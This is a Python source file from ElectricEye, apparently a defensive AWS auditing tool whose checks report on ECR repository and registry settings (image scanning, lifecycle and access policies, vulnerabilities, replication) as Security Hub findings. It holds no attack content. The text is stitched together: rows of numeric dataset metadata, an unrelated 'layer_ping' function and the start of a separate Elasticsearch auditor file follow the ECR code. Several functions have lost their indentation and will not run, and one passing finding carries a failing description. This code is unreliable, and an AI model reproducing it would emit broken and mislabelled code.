#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
import botocore
from check_register import CheckRegister
registry = CheckRegister()  # collects the checks registered by the decorators below
# import boto3 clients
ecr = boto3.client("ecr")  # module-level client shared by every check in this file
# loop through ECR repos
def describe_repositories(cache):
    """Return the DescribeRepositories response, memoised in *cache*."""
    cached = cache.get("describe_repositories")
    if not cached:
        cached = ecr.describe_repositories(maxResults=1000)
        cache["describe_repositories"] = cached
    return cached
@registry.register_check("ecr")
def ecr_repo_vuln_scan_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.1] ECR repositories should be configured to scan images on push"""
response = describe_repositories(cache)
myRepos = response["repositories"]
for repo in myRepos:
repoArn = str(repo["repositoryArn"])
repoName = str(repo["repositoryName"])
scanningConfig = str(repo["imageScanningConfiguration"]["scanOnPush"])
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if scanningConfig == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-no-scan",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ECR.1] ECR repositories should be configured to scan images on push",
"Description": "ECR repository "
+ repoName
+ " is not configured to scan images on push. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to scan on push refer to the Image Scanning section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.CM-8",
"NIST SP 800-53 RA-5",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.6.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-no-scan",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.1] ECR repositories should be configured to scan images on push",
"Description": "ECR repository "
+ repoName
+ " is configured to scan images on push.",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to scan on push refer to the Image Scanning section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.CM-8",
"NIST SP 800-53 RA-5",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.6.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("ecr")
def ecr_repo_image_lifecycle_policy_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.2] ECR repositories should be have an image lifecycle policy configured"""
response = describe_repositories(cache)
myRepos = response["repositories"]
for repo in myRepos:
repoArn = str(repo["repositoryArn"])
repoName = str(repo["repositoryName"])
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
try:
# this is a passing finding
response = ecr.get_lifecycle_policy(repositoryName=repoName)
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-lifecycle-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.2] ECR repositories should be have an image lifecycle policy configured",
"Description": "ECR repository "
+ repoName
+ " does not have an image lifecycle policy configured. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to have an image lifecycle policy refer to the Amazon ECR Lifecycle Policies section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/LifecyclePolicies.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except:
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-lifecycle-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ECR.2] ECR repositories should be have an image lifecycle policy configured",
"Description": "ECR repository "
+ repoName
+ " does not have an image lifecycle policy configured. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to have an image lifecycle policy refer to the Amazon ECR Lifecycle Policies section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/LifecyclePolicies.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.AM-2",
"NIST SP 800-53 CM-8",
"NIST SP 800-53 PM-5",
"AICPA TSC CC3.2",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.1.1",
"ISO 27001:2013 A.8.1.2",
"ISO 27001:2013 A.12.5.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
@registry.register_check("ecr")
def ecr_repo_permission_policy_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.3] ECR repositories should be have a repository policy configured"""
response = describe_repositories(cache)
myRepos = response["repositories"]
for repo in myRepos:
repoArn = str(repo["repositoryArn"])
repoName = str(repo["repositoryName"])
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
try:
# this is a passing finding
response = ecr.get_repository_policy(repositoryName=repoName)
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-repo-access-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.3] ECR repositories should be have a repository policy configured",
"Description": "ECR repository "
+ repoName
+ " has a repository policy configured.",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to have a repository policy refer to the Amazon ECR Repository Policies section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policies.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except:
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoArn + "/ecr-repo-access-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": repoArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ECR.3] ECR repositories should be have a repository policy configured",
"Description": "ECR repository "
+ repoName
+ " does not have a repository policy configured. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to have a repository policy refer to the Amazon ECR Repository Policies section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policies.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
@registry.register_check("ecr")
def ecr_latest_image_vuln_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.4] The latest image in an ECR Repository should not have any vulnerabilities"""
response = describe_repositories(cache)
myRepos = response["repositories"]
for repo in myRepos:
repoArn = str(repo["repositoryArn"])
repoName = str(repo["repositoryName"])
scanningConfig = str(repo["imageScanningConfiguration"]["scanOnPush"])
if scanningConfig == "True":
try:
response = ecr.describe_images(
repositoryName=repoName, filter={"tagStatus": "TAGGED"}, maxResults=1000,
)
for images in response["imageDetails"]:
imageDigest = str(images["imageDigest"])
# use the first tag only as we need it to create the canonical ID for the Resource.Id in the ASFF for the Container Resource.Type
imageTag = str(images["imageTags"][0])
imageVulnCheck = str(
images["imageScanFindingsSummary"]["findingSeverityCounts"]
)
# ISO Time
iso8601Time = (
datetime.datetime.utcnow()
.replace(tzinfo=datetime.timezone.utc)
.isoformat()
)
if imageVulnCheck != "{}":
vulnDeepLink = (
"https://console.aws.amazon.com/ecr/repositories/"
+ repoName
+ "/image/"
+ imageDigest
+ "/scan-results?region="
+ awsRegion
)
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoName + "/" + imageDigest + "/ecr-latest-image-vuln-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": imageDigest,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/Vulnerabilities/CVE",
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ECR.4] The latest image in an ECR Repository should not have any vulnerabilities",
"Description": "The latest image in the ECR repository "
+ repoName
+ " has the following vulnerabilities reported: "
+ imageVulnCheck
+ ". Refer to the SourceUrl or Remediation.Recommendation.Url to review the specific vulnerabilities and remediation information from ECR.",
"Remediation": {
"Recommendation": {
"Text": "Click here to navigate to the ECR Vulnerability console for this image",
"Url": vulnDeepLink,
}
},
"SourceUrl": vulnDeepLink,
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "Container",
"Id": repoName + ":" + imageTag,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"Container": {
"Name": repoName + ":" + imageTag,
"ImageId": imageDigest,
},
"Other": {
"RepositoryName": repoName,
"RepositoryArn": repoArn,
},
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.CM-8",
"NIST SP 800-53 RA-5",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.6.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoName + "/" + imageDigest + "/ecr-latest-image-vuln-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": imageDigest,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/Vulnerabilities/CVE",
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.4] The latest image in an ECR Repository should not have any vulnerabilities",
"Description": "The latest image in the ECR repository "
+ repoName
+ " does not have any vulnerabilities reported.",
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "Container",
"Id": repoName + ":" + imageTag,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"Container": {
"Name": repoName + ":" + imageTag,
"ImageId": imageDigest,
},
"Other": {
"RepositoryName": repoName,
"RepositoryArn": repoArn,
},
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.CM-8",
"NIST SP 800-53 RA-5",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.6.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except Exception as e:
print(e)
else:
pass
@registry.register_check("ecr")
def ecr_registry_policy_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[ECR.5] ECR Registries should have a registry policy configured to allow for cross-account recovery

    Yields a PASSED finding when the account's private ECR registry has a
    registry policy configured, and a FAILED (LOW) finding when
    RegistryPolicyNotFoundException is raised by get_registry_policy().
    """
    # ISO 8601 timestamp reused by whichever finding is emitted
    iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
    try:
        # Raises RegistryPolicyNotFoundException when no policy is configured,
        # so reaching the next statement means the check passes
        ecr.get_registry_policy()
        # This is a passing check
        finding = {
            "SchemaVersion": "2018-10-08",
            "Id": awsAccountId + awsRegion + "/ecr-registry-access-policy-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": awsAccountId + awsRegion,
            "AwsAccountId": awsAccountId,
            "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": "INFORMATIONAL"},
            "Confidence": 99,
            "Title": "[ECR.5] ECR Registries should have a registry policy configured to allow for cross-account recovery",
            "Description": "ECR Registry "
            + awsAccountId
            + " in Region "
            + awsRegion
            + " has a registry policy configured.",
            "Remediation": {
                "Recommendation": {
                    "Text": "If your Registry should be configured to have a Registry policy refer to the Private registry permissions section in the Amazon ECR User Guide",
                    "Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html"
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsEcrRegistry",
                    "Id": awsAccountId,
                    "Partition": awsPartition,
                    "Region": awsRegion,
                    "Details": {"Other": {"RegistryId": awsAccountId}},
                }
            ],
            "Compliance": {
                "Status": "PASSED",
                "RelatedRequirements": [
                    "NIST CSF ID.BE-5",
                    "NIST CSF PR.PT-5",
                    "NIST SP 800-53 CP-2",
                    "NIST SP 800-53 CP-11",
                    "NIST SP 800-53 SA-13",
                    "NIST SP 800-53 SA14",
                    "AICPA TSC CC3.1",
                    "AICPA TSC A1.2",
                    "ISO 27001:2013 A.11.1.4",
                    "ISO 27001:2013 A.17.1.1",
                    "ISO 27001:2013 A.17.1.2",
                    "ISO 27001:2013 A.17.2.1",
                ]
            },
            "Workflow": {"Status": "RESOLVED"},
            "RecordState": "ARCHIVED",
        }
        yield finding
    except botocore.exceptions.ClientError as error:
        # Only the "no policy" error is a finding; anything else is unexpected
        if error.response["Error"]["Code"] == "RegistryPolicyNotFoundException":
            # this is a failing check
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": awsAccountId + awsRegion + "/ecr-registry-access-policy-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": awsAccountId + awsRegion,
                "AwsAccountId": awsAccountId,
                "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "LOW"},
                "Confidence": 99,
                "Title": "[ECR.5] ECR Registries should have a registry policy configured to allow for cross-account recovery",
                "Description": "ECR Registry "
                + awsAccountId
                + " in Region "
                + awsRegion
                + " does not have a registry policy configured. ECR uses a registry policy to grant permissions to an AWS principal, allowing the replication of the repositories from a source registry to your registry. By default, you have permission to configure cross-Region replication within your own registry. You only need to configure the registry policy if you're granting another account permission to replicate contents to your registry. Refer to the remediation instructions if this configuration is not intended",
                "Remediation": {
                    "Recommendation": {
                        "Text": "If your Registry should be configured to have a Registry policy refer to the Private registry permissions section in the Amazon ECR User Guide",
                        "Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html"
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsEcrRegistry",
                        "Id": awsAccountId,
                        "Partition": awsPartition,
                        "Region": awsRegion,
                        "Details": {"Other": {"RegistryId": awsAccountId}},
                    }
                ],
                "Compliance": {
                    "Status": "FAILED",
                    "RelatedRequirements": [
                        "NIST CSF ID.BE-5",
                        "NIST CSF PR.PT-5",
                        "NIST SP 800-53 CP-2",
                        "NIST SP 800-53 CP-11",
                        "NIST SP 800-53 SA-13",
                        "NIST SP 800-53 SA14",
                        "AICPA TSC CC3.1",
                        "AICPA TSC A1.2",
                        "ISO 27001:2013 A.11.1.4",
                        "ISO 27001:2013 A.17.1.1",
                        "ISO 27001:2013 A.17.1.2",
                        "ISO 27001:2013 A.17.2.1",
                    ]
                },
                "Workflow": {"Status": "NEW"},
                "RecordState": "ACTIVE",
            }
            yield finding
        else:
            print(error)
    except Exception as e:
        print(e)
@registry.register_check("ecr")
def ecr_registry_backup_rules_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[ECR.6] ECR Registries should use image replication to promote disaster recovery readiness

    Yields a FAILED (LOW) finding when the registry has no replication rules
    configured and a PASSED finding otherwise.
    """
    # ISO 8601 timestamp reused by whichever finding is emitted
    iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
    # Check the replication rule list's emptiness directly instead of comparing
    # its str() representation against "[]"
    if not ecr.describe_registry()["replicationConfiguration"]["rules"]:
        # This is a failing check
        finding = {
            "SchemaVersion": "2018-10-08",
            "Id": awsAccountId + awsRegion + "/ecr-registry-image-replication-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": awsAccountId + awsRegion,
            "AwsAccountId": awsAccountId,
            "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": "LOW"},
            "Confidence": 99,
            "Title": "[ECR.6] ECR Registries should use image replication to promote disaster recovery readiness",
            "Description": "ECR Registry "
            + awsAccountId
            + " in Region "
            + awsRegion
            + " does not use Image replication. Registries can be configured to backup images to other Regions within your own Account or to other AWS Accounts to aid in disaster recovery readiness. Refer to the remediation instructions if this configuration is not intended",
            "Remediation": {
                "Recommendation": {
                    "Text": "If your Registry should be configured to for Private image replication refer to the Private image replication section in the Amazon ECR User Guide",
                    "Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/replication.html"
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsEcrRegistry",
                    "Id": awsAccountId,
                    "Partition": awsPartition,
                    "Region": awsRegion,
                    "Details": {"Other": {"RegistryId": awsAccountId}},
                }
            ],
            "Compliance": {
                "Status": "FAILED",
                "RelatedRequirements": [
                    "NIST CSF ID.BE-5",
                    "NIST CSF PR.PT-5",
                    "NIST SP 800-53 CP-2",
                    "NIST SP 800-53 CP-11",
                    "NIST SP 800-53 SA-13",
                    "NIST SP 800-53 SA14",
                    "AICPA TSC CC3.1",
                    "AICPA TSC A1.2",
                    "ISO 27001:2013 A.11.1.4",
                    "ISO 27001:2013 A.17.1.1",
                    "ISO 27001:2013 A.17.1.2",
                    "ISO 27001:2013 A.17.2.1",
                ]
            },
            "Workflow": {"Status": "NEW"},
            "RecordState": "ACTIVE"
        }
        yield finding
    else:
        finding = {
            "SchemaVersion": "2018-10-08",
            "Id": awsAccountId + awsRegion + "/ecr-registry-image-replication-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            # use the same accountId+region GeneratorId as the failing branch
            "GeneratorId": awsAccountId + awsRegion,
            "AwsAccountId": awsAccountId,
            "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": "INFORMATIONAL"},
            "Confidence": 99,
            "Title": "[ECR.6] ECR Registries should use image replication to promote disaster recovery readiness",
            "Description": "ECR Registry "
            + awsAccountId
            + " in Region "
            + awsRegion
            + " uses Image replication.",
            "Remediation": {
                "Recommendation": {
                    "Text": "If your Registry should be configured to for Private image replication refer to the Private image replication section in the Amazon ECR User Guide",
                    "Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/replication.html"
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsEcrRegistry",
                    "Id": awsAccountId,
                    "Partition": awsPartition,
                    "Region": awsRegion,
                    "Details": {"Other": {"RegistryId": awsAccountId}},
                }
            ],
            "Compliance": {
                "Status": "PASSED",
                "RelatedRequirements": [
                    "NIST CSF ID.BE-5",
                    "NIST CSF PR.PT-5",
                    "NIST SP 800-53 CP-2",
                    "NIST SP 800-53 CP-11",
                    "NIST SP 800-53 SA-13",
                    "NIST SP 800-53 SA14",
                    "AICPA TSC CC3.1",
                    "AICPA TSC A1.2",
                    "ISO 27001:2013 A.11.1.4",
                    "ISO 27001:2013 A.17.1.1",
                    "ISO 27001:2013 A.17.1.2",
                    "ISO 27001:2013 A.17.2.1",
                ]
            },
            "Workflow": {"Status": "RESOLVED"},
            "RecordState": "ARCHIVED"
        }
        yield finding
| 49.812821
| 525
| 0.466644
| 3,165
| 38,854
| 5.713428
| 0.107425
| 0.01659
| 0.024885
| 0.030415
| 0.85749
| 0.854449
| 0.848421
| 0.840568
| 0.840568
| 0.836753
| 0
| 0.048538
| 0.429454
| 38,854
| 780
| 526
| 49.812821
| 0.767187
| 0.041952
| 0
| 0.799728
| 0
| 0.02861
| 0.387979
| 0.045255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009537
| false
| 0.009537
| 0.00545
| 0
| 0.017711
| 0.004087
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1998a450d7cad5cff37b5dc708a3fe2a61a5a10f
| 71
|
py
|
Python
|
tests/integration/testdata/invoke/layers/custom_layer/my_layer/simple_python.py
|
renanmontebelo/aws-sam-cli
|
b5cfc46aa9726b5cd006df8ecc08d1b4eedeb9ea
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 2,959
|
2018-05-08T21:48:56.000Z
|
2020-08-24T14:35:39.000Z
|
tests/integration/testdata/invoke/layers/custom_layer/my_layer/simple_python.py
|
renanmontebelo/aws-sam-cli
|
b5cfc46aa9726b5cd006df8ecc08d1b4eedeb9ea
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 1,469
|
2018-05-08T22:44:28.000Z
|
2020-08-24T20:19:24.000Z
|
tests/integration/testdata/invoke/layers/custom_layer/my_layer/simple_python.py
|
renanmontebelo/aws-sam-cli
|
b5cfc46aa9726b5cd006df8ecc08d1b4eedeb9ea
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 642
|
2018-05-08T22:09:19.000Z
|
2020-08-17T09:04:37.000Z
|
def layer_ping():
    """Return a fixed marker string proving this layer's code was invoked."""
    message = "This is a Layer Ping from simple_python"
    return message
| 23.666667
| 52
| 0.732394
| 12
| 71
| 4.166667
| 0.833333
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.197183
| 71
| 2
| 53
| 35.5
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0.549296
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
270d24345262b87296bac736a240a608dbc05890
| 68,619
|
py
|
Python
|
eeauditor/auditors/aws/Amazon_ElasticsearchService_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/Amazon_ElasticsearchService_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/Amazon_ElasticsearchService_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
registry = CheckRegister()
# import boto3 clients
elasticsearch = boto3.client("es")
